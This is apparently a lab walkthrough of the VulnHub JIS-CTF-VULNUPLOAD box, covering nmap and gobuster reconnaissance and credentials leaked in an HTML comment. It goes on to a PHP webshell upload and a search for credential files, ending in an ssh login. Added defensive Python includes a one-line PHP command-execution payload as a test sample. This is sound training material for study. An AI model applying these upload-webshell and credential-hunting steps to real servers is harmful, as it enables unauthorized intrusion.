JIS-CTF-VULNUPLOAD

Target description

https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/

Host discovery

┌──(kali㉿kali)-[/miao/vulnhub/JIS-CTF]
└─$ sudo nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 04:15 EST
Nmap scan report for 192.168.2.1
Host is up (0.00012s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00020s latency).
MAC Address: 08:00:27:5B:20:82 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.5
Host is up (0.00050s latency).
MAC Address: 08:00:27:54:5C:4F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.03 seconds

nmap scan

(1) Full TCP port scan

┌──(kali㉿kali)-[/miao/vulnhub/JIS-CTF]
└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.2.5 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 04:19 EST
Nmap scan report for 192.168.2.5
Host is up (0.0061s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:54:5C:4F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.69 seconds

(2) Service and OS detection on the open ports

┌──(kali㉿kali)-[/miao/vulnhub/JIS-CTF]
└─$ sudo nmap -sT -sV -O --min-rate 10000 -p 22,80 192.168.2.5 -oA nmapscan/detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 04:20 EST
Nmap scan report for 192.168.2.5
Host is up (0.00079s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:54:5C:4F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.80 seconds

(3) UDP scan of the same ports

┌──(kali㉿kali)-[/miao/vulnhub/JIS-CTF]
└─$ sudo nmap -sU -p22,80 192.168.2.5 -oA nmapscan/udp
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 04:21 EST
Stats: 0:00:05 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 192.168.2.5
Host is up (0.00072s latency).

PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 08:00:27:54:5C:4F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.20 seconds

(4) Vulnerability script scan

┌──(kali㉿kali)-[/miao/vulnhub/JIS-CTF]
└─$ sudo nmap --script=vuln -p22,80 192.168.2.5 -oA nmapscan/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 04:24 EST
Nmap scan report for 192.168.2.5
Host is up (0.00094s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.2.5
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.2.5:80/
| Form id:
|_ Form action: check_login.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum:
| /admin_area/: Possible admin folder
| /login.php: Possible admin folder
| /admin_area/index.php: Possible admin folder
| /robots.txt: Robots file
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_ /js/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
MAC Address: 08:00:27:54:5C:4F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 334.73 seconds

Web penetration

Port 80

(1) Visiting port 80 shows a login form.

(2) Directory scan with gobuster

┌──(kali㉿kali)-[/miao/vulnhub/JIS-CTF]
└─$ sudo gobuster dir -u http://192.168.2.5 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.5
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 302) [Size: 1228] [--> login.php]
/.php (Status: 403) [Size: 290]
/.html (Status: 403) [Size: 291]
/login.php (Status: 200) [Size: 1485]
/assets (Status: 301) [Size: 311] [--> http://192.168.2.5/assets/]
/css (Status: 301) [Size: 308] [--> http://192.168.2.5/css/]
/js (Status: 301) [Size: 307] [--> http://192.168.2.5/js/]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/flag (Status: 301) [Size: 309] [--> http://192.168.2.5/flag/]
/flag.txt (Status: 403) [Size: 294]
/robots.txt (Status: 200) [Size: 160]
/.php (Status: 403) [Size: 290]
/.html (Status: 403) [Size: 291]
/uploaded_files (Status: 301) [Size: 319] [--> http://192.168.2.5/uploaded_files/]
/hint.txt (Status: 200) [Size: 145]
/server-status (Status: 403) [Size: 299]
Progress: 830572 / 830576 (100.00%)
===============================================================
Finished
===============================================================

(3) Visiting the /flag path reveals the first flag

The 1st flag is : {8734509128730458630012095}

(4) Visiting robots.txt reveals the following paths

User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag

  • Visiting each path in turn, admin_area is accessible; viewing the page source reveals the second flag
<html>
<head>
<title>
Fake admin area :)
</title>
<body>
<center><h1>The admin area not work :) </h1></center>
<!-- username : admin
password : 3v1l_H@ck3r
The 2nd flag is : {7412574125871236547895214}
-->
</body>
</html>

  • Logging in with the username and password from the HTML comment succeeds and leads to a file upload page
  • Test the file upload
    Uploading a PHP backdoor directly is accepted without any check. The directory where uploads are stored still has to be located: /robots.txt lists it as uploaded_files
    Connecting to the site with the Godzilla webshell manager gives a shell on the web server

flag.txt is found, but reading it fails with a permission error.
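The upload page on this box stores whatever it is given, name and content untouched, inside the web root, which is why a .php file becomes a webshell. The following is an added example, not code from the box or from this writeup, showing the checks a hardened upload handler performs: an extension allowlist, magic-byte verification of the content, rejection of path components and of server-interpreted segments such as .php anywhere in the name, and a random server-chosen filename stored without execute permission. The ALLOWED_TYPES table, the FORBIDDEN_SEGMENTS set, the size limit and the sample inputs are assumptions constructed for the example.

```python
import os
import secrets
import stat
import tempfile
from pathlib import Path

# Extension allowlist with the magic bytes each file type must begin with.
# The table is an assumption for this example; extend it per application.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}

# Name segments Apache may hand to the PHP handler (e.g. "x.php.png" under a
# permissive AddHandler). Any of these anywhere in the name is rejected.
FORBIDDEN_SEGMENTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "htaccess"}

MAX_SIZE = 2 * 1024 * 1024  # 2 MiB, an assumed limit for the example


class UploadRejected(ValueError):
    """Raised with a short reason when an upload fails validation."""


def validate_upload(filename: str, data: bytes) -> str:
    """Return the accepted lower-case extension, or raise UploadRejected."""
    if len(data) == 0 or len(data) > MAX_SIZE:
        raise UploadRejected("size")
    # Client-supplied names may carry directories or NUL bytes; the basename
    # must equal the original so traversal attempts are rejected, not silently stripped.
    if "\x00" in filename or os.path.basename(filename) != filename:
        raise UploadRejected("path component in filename")
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise UploadRejected("no extension")
    ext = parts[-1]
    if ext not in ALLOWED_TYPES:
        raise UploadRejected("extension not allowed")
    if any(seg in FORBIDDEN_SEGMENTS for seg in parts[1:-1]):
        raise UploadRejected("server-interpreted extension in name")
    # Content must match the claimed type: a PHP script renamed to .png fails here.
    if not data.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match extension")
    return ext


def check(filename: str, data: bytes) -> str:
    """Convenience wrapper: 'accepted:<ext>' or 'rejected:<reason>'."""
    try:
        return "accepted:" + validate_upload(filename, data)
    except UploadRejected as exc:
        return "rejected:" + str(exc)


def store_upload(filename: str, data: bytes, upload_dir: Path) -> Path:
    """Validate and write the file under a random server-chosen name."""
    ext = validate_upload(filename, data)
    # Never reuse the client's name; a random name also defeats overwrite attempts.
    dest = upload_dir / f"{secrets.token_hex(16)}.{ext}"
    dest.write_bytes(data)
    dest.chmod(0o640)  # not executable, readable only by owner and group
    return dest


def demo() -> dict:
    """Store one constructed PNG in a temporary directory and report the outcome."""
    upload_dir = Path(tempfile.mkdtemp())
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # constructed minimal PNG header
    dest = store_upload("holiday.png", png, upload_dir)
    return {
        "suffix": dest.suffix,
        "renamed": dest.name != "holiday.png",
        "mode": stat.S_IMODE(dest.stat().st_mode),
    }


if __name__ == "__main__":
    samples = [
        ("cat.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
        ("shell.php", b"<?php system($_GET['c']); ?>"),
        ("shell.php.png", b"\x89PNG\r\n\x1a\n"),
        ("fake.png", b"<?php echo 1; ?>"),
        ("../escape.png", b"\x89PNG\r\n\x1a\n"),
    ]
    for name, body in samples:
        print(f"{name:16} -> {check(name, body)}")
    print(demo())
```

Even with these checks the upload directory should sit outside the web root, or be served with PHP execution disabled, so that a bypass of the validation still yields a static file rather than a shell.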

(5) Visiting hint.txt reveals the third flag

try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)

The 3rd flag is : {7645110034526579012345670}

(6) According to hint.txt, the password of user technawi is needed to read flag.txt.
Search the filesystem for files owned by technawi:

find / -user 'technawi' 2>/dev/null
# 2>/dev/null discards stderr, so the "Permission denied" errors for unreadable directories are not printed


This turns up a database configuration file; reading it reveals the fourth flag and technawi's password

/var/www/html/uploaded_files/ >cat /etc/mysql/conf.d/credentials.txt

The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor
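Two of the leaks in this walkthrough are the same defect: a plain-text password sitting where the web server user can read it, once inside an HTML comment served from /admin_area and once in a file under /etc/mysql/conf.d that is readable by www-data. As an added example that is not part of the original writeup, this scanner walks a directory tree, flags lines that look like hard-coded passwords, notes whether a finding sits inside an HTML comment (and is therefore delivered to every visitor), and records whether the file is world-readable. The regular expressions, the directory layout and the file contents in build_sample_tree are constructed for the example and use placeholder values rather than the box's real credentials.

```python
import re
import stat
import tempfile
from pathlib import Path

# Lines that commonly carry a hard-coded secret. The patterns are an assumption
# for this example; tune them to the application's configuration syntax.
CRED_PATTERNS = (
    re.compile(r"\bpass(word|wd)?\s*[:=]\s*\S+", re.I),
    re.compile(r"\b(api|secret)_?key\s*[:=]\s*\S+", re.I),
)
HTML_COMMENT = re.compile(r"<!--.*?-->", re.S)


def comment_lines(text: str) -> set:
    """1-based numbers of the lines that fall inside an HTML comment."""
    lines = set()
    for m in HTML_COMMENT.finditer(text):
        first = text.count("\n", 0, m.start()) + 1
        last = text.count("\n", 0, m.end()) + 1
        lines.update(range(first, last + 1))
    return lines


def scan_file(path: Path) -> list:
    """Return one finding per line of `path` that matches a credential pattern."""
    text = path.read_text(errors="replace")
    in_comment = comment_lines(text)
    mode = path.stat().st_mode
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if any(p.search(line) for p in CRED_PATTERNS):
            findings.append({
                "path": str(path),
                "line": no,
                # A secret inside an HTML comment is sent to every client of the page.
                "where": "html-comment" if no in in_comment else "line",
                # Other-readable means any local account, www-data included, can read it.
                "world_readable": bool(mode & stat.S_IROTH),
            })
    return findings


def scan_tree(root: Path) -> list:
    """Scan every regular file below `root`, in a stable (sorted) order."""
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and not path.is_symlink():
            findings.extend(scan_file(path))
    return findings


def build_sample_tree() -> Path:
    """Constructed sample mirroring the two leaks from the walkthrough (placeholder secrets)."""
    root = Path(tempfile.mkdtemp())
    admin = root / "var/www/html/admin_area"
    admin.mkdir(parents=True)
    (admin / "index.php").write_text(
        "<html><body><h1>The admin area not work :)</h1>\n"
        "<!-- username : admin\npassword : PLACEHOLDER_PW -->\n"
        "</body></html>\n"
    )
    conf = root / "etc/mysql/conf.d"
    conf.mkdir(parents=True)
    cred = conf / "credentials.txt"
    cred.write_text("username : technawi\npassword : PLACEHOLDER_PW\n")
    cred.chmod(0o644)  # readable by the web server user, as on the box
    (root / "var/www/html/index.php").write_text("<?php header('Location: login.php'); ?>\n")
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        flag = "WORLD-READABLE " if f["world_readable"] else ""
        print(f"{flag}{f['where']:12} {f['path']}:{f['line']}")
```

Run against a real web root and /etc the same scanner reports where the equivalent of credentials.txt lives and whether its mode lets the service account read it; the fix is to move such secrets out of the document root, restrict the file to the owning user, and never leave them in markup comments.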

Privilege escalation: ssh

(1) hint.txt says flag.txt must be read as user technawi, and the target has port 22 open, so try an ssh login with the recovered password

┌──(kali㉿kali)-[/]
└─$ ssh technawi@192.168.2.5
technawi@192.168.2.5's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-72-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Fri Apr 21 17:22:16 2017

(2) The login as technawi succeeds; read flag.txt

technawi@Jordaninfosec-CTF01:~$ cat /var/www/html/flag.txt
The 5th flag is : {5473215946785213456975249}

Good job :)

You find 5 flags and got their points and finish the first scenario....

Summary

(1) The box mainly tests file upload and ssh privilege escalation. It is fairly easy, but it rewards attention to detail: every path listed in robots.txt and the directory scan has to be checked.


Source: http://miao-sec.github.io/Vulnhub/JIS-CTF-VULNUPLOAD/
Author: Miao
Published: June 20, 2025
License: BY-MIAO